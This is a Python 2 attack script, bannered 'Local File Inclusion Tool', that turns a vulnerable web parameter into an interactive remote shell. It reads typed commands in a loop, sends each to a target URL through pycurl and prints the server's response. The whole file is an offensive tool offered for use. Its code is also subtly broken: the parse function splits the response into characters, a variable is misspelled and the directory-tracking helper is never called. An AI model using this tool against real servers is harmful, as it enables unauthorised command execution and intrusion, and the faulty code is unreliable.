#!/usr/bin/python

import argparse
import sys, os
from subprocess import call
import pycurl
import re
from StringIO import StringIO


parser = argparse.ArgumentParser(description='Create an interactive shell with a local file inclusion vulnerability')
parser.add_argument('-u','--url', help='LFI url',required=True)
parser.add_argument('-v','--variable', help='Command variable',required=True)
args = parser.parse_args()


command=""
newDir=""
oldDir=""

def printHeader():
    print ("""
    
    
     /$$       /$$$$$$$$ /$$$$$$        /$$$$$$$$
    | $$      | $$_____/|_  $$_/       |__  $$__/             __     __
    | $$      | $$        | $$   /$$$$$$$ | $$               /  \~~~/  \ 
    | $$      | $$$$$     | $$  | $$__  $$| $$         ,----(     ..    )
    | $$      | $$__/     | $$  | $$  \ $$| $$        /      \__     __/
    | $$      | $$        | $$  | $$  | $$| $$       /|         (\  |(
    | $$$$$$$$| $$       /$$$$$$| $$  | $$| $$      ^ \   /___\  /\ |
    |________/|__/      |______/|__/  |__/|__/         |__|   |__|-"
    
       Local     File        Inclusion     Tool
    """)



def parse(temp):

    #parsedString = ""
    #os.system("awk '!seen[$0]++' temp.txt > temp2.txt")
    #os.system("awk '!seen[$1]++' temp.txt > temp2.txt")
   

    
    #seperate = '<'
    
    #splitString = temp.split(seperate, 1) [0]
    #lineList = splitString.split("\n") 

    #lineSeen = set()
    #for line in lineList:
        #if line not in lineSeen:
            #parsedString = parsedString + line + "\n"
            #lineSeen.add(line)

    return [parsedString for parsedString in temp if " " not in parsedString]
    #return parsedString


def chngDir(command):
    if "cd" in command:
        command = command.replace("cd ", "")
        if(newDir):
            olDir = newDir
            newDir = oldDir+newDir
        newDir = command
    if "ls" in command:
        command = command+" "+newDir
        return command
        #print newDir

def curl(url):
    buffer = StringIO()
    c = pycurl.Curl()
    c.setopt(c.URL, url)
    c.setopt(c.WRITEDATA, buffer)
    c.perform()
    c.close()
    body = buffer.getvalue()
    return body


printHeader()


#####  MAIN METHOD #####
while(command != "exit"):
    command = raw_input("$ ")
    #chngDir(command)

    if "cd" in command:
        command = command.replace("cd ", "")
        if(newDir):
            olDir = newDir
            newDir = oldDir+newDir
        newDir = command
    if "ls" in command:
        command = command+" "+newDir

    command = command.replace(" ", "%20")
    url = args.url+"&"+args.variable+"="+command
    temp = curl(url)
    parsedString = parse(temp)
    print parsedString


